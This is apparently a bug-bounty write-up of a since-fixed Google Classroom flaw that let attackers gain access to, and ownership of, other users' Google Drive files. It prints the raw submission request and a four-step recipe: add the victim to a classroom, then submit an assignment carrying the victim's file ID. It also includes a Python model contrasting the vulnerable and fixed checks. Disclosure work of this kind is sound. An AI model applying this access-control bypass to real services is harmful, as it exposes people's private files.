Leaking All Users' Google Drive Files
Hey All!
Long time no see. I decided to make some new blog posts about some of my top Google findings I have had over the years. I am hoping to write up more of these as a kind of continuous series over the next few weeks, so stay tuned.
In this new post I am writing up an interesting find I had a few years ago that allowed you to gain access to another user's Google Drive files. For those that do not know, Google Drive is a file sharing service where you can upload Word docs, PDF files, or any file for that matter, and share it with other users. If the file is private or not meant to be shared with you, you would receive an access denied error.
Today I am going to show you how it was possible to gain access to someone else's Google Drive files without being granted access to it :).
Before I begin I do want to say the issue is fixed and Google VRP gave a nice bounty for it :D.
POC:
So before I begin going over this POC I need to explain a little background about Google Classroom. For those that do not know, Google Classroom is an offering Google provides for teachers/students to collaborate in a classroom-like environment. You can find it at classroom.google.com, and the way it works is teachers can post announcements, assignments, grade papers, etc.
Now when a teacher posts an assignment on Google Classroom students then receive a page to submit their assignment to the teacher. This page looks like this for example:
A student would see the above page to submit an assignment to the teachers of the classroom for grading.
Now when submitting an assignment, students had the ability to attach a file to the assignment. So let's say a student needed to attach a paper they wrote up for the class. They would attach their Google Doc from Drive to the assignment and hit submit.
Here is where the issue now comes into play.
When a student submitted an assignment to the teacher, Google Classroom had a process that would then grant the teachers of the classroom ownership over the submitted document. This is needed because obviously the teachers need to be able to read the document once a student submits it.
Now when a student actually added a Google Drive file to their assignment, this is the API request that would run:
POST /v7/writesubmission?_reqid=4786040&rt=j HTTP/1.1
Host: classroom.google.com
f.req=[[3],[[["18537069787",["46653220298",["41400909728"]]],[["18537069787",["46653220298",["41400909728"]]],null,null,null,[[null,null,"1h8tReWm8Cp6bsv24BwMlimFrJ3w1d7sdpxYHfUr1rgw",2,"application/vnd.google-apps.ritz",null,null,null,null,null,null,null,null,null,[null,2]]],null,[],null,null,null,null,null,null,null,null,null,null,null,[],[]],[null,true],[]]],[null,true,null,true,true,null,true,true,true,null,null,null,true,null,[true],null,null,null,true,true,true,null,null,null,[[true,true]],[[true,true]]]]
If we look closely you can see this value: "1h8tReWm8Cp6bsv24BwMlimFrJ3w1d7sdpxYHfUr1rgw". This is the ID of the student's Google Drive file being submitted for the assignment.
There were no proper RBAC checks to verify that you actually owned the Google Drive file being attached to the assignment.
So now we know we can attach any Google Drive file to our assignment, but will the Google Classroom back end grant me access to the file?
During initial testing it did not grant me access. As a result, at the time I thought the RBAC checks were working properly and it was more just a UI thing, if anything. I was not able to gain access to the Google Drive file of my other account by simply changing the ID in the above request.
The bypass?
After some further digging I found a bypass that fully worked. If you added the person you were targeting to your Google Classroom as a student/teacher, you would then be able to gain full access to their Google Drive file using the above request.
The flow here would then be:
1. Add the user you were targeting to your Google Classroom and create an assignment in the Classroom.
2. Add another account that you control to the classroom as a student and sign into that account.
3. As the student account you signed in as, submit an assignment and modify this request:
POST /v7/writesubmission?_reqid=4786040&rt=j HTTP/1.1
Host: classroom.google.com
f.req=[[3],[[["18537069787",["46653220298",["41400909728"]]],[["18537069787",["46653220298",["41400909728"]]],null,null,null,[[null,null,"1h8tReWm8Cp6bsv24BwMlimFrJ3w1d7sdpxYHfUr1rgw",2,"application/vnd.google-apps.ritz"
Put in the ID of a Google Drive file from the Drive of the user you are targeting (the user you added to the classroom in step 1).
4. Submit the assignment and you will now be able to access their entire Google Drive file and gain ownership over it.
That's it :) 
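To make the missing check concrete, here is a small added model of the submission step (my own illustration, not Google's code): the vulnerable handler trusts the client-supplied file ID and only gates on classroom membership, which reproduces both the failed first test and the bypass above, while the fixed handler requires that the submitting student own the file. The in-memory Drive, classroom and all account names are constructed.

```python
# Added illustration of the bug above, not Google's code: an in-memory model of
# Drive files, a classroom and "write submission". All names are constructed.
from dataclasses import dataclass, field

@dataclass
class DriveFile:
    file_id: str
    owner: str
    shared_with: set = field(default_factory=set)  # accounts granted access

@dataclass
class Classroom:
    teachers: set
    students: set

    def members(self):
        return self.teachers | self.students

def write_submission_vulnerable(drive, room, submitter, file_id):
    """Original behaviour: the file ID is taken from the client and never
    compared with the submitter. Teachers gain access whenever the file's
    owner is a classroom member (a non-member's file stays protected, which
    matches the author's first test; a member's file does not)."""
    f = drive.get(file_id)
    if f is None or submitter not in room.students:
        return False
    if f.owner in room.members():
        f.shared_with.update(room.teachers)
        return True
    return False

def write_submission_fixed(drive, room, submitter, file_id):
    """Hardened: teachers get access only when the authenticated submitter
    owns the attached file; the client-chosen ID alone decides nothing."""
    f = drive.get(file_id)
    if f is None or submitter not in room.students:
        return False
    if f.owner != submitter:
        return False  # attaching someone else's file is rejected
    f.shared_with.update(room.teachers)
    return True

def build_scenario():
    """Constructed fixture: 'target' owns a file and was added to the class;
    'student' is a second account that submits the assignment."""
    drive = {"FILE_TARGET": DriveFile("FILE_TARGET", owner="target"),
             "FILE_OUTSIDER": DriveFile("FILE_OUTSIDER", owner="outsider"),
             "FILE_STUDENT": DriveFile("FILE_STUDENT", owner="student")}
    room = Classroom(teachers={"teacher"}, students={"target", "student"})
    return drive, room
```

Run both handlers against build_scenario() to see that only the fixed one refuses to share FILE_TARGET with the teacher.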
Here is a video as well:
Mind the music, as Google VRP likes music so I usually add it.
If you have any questions please feel free to reach out to me on X: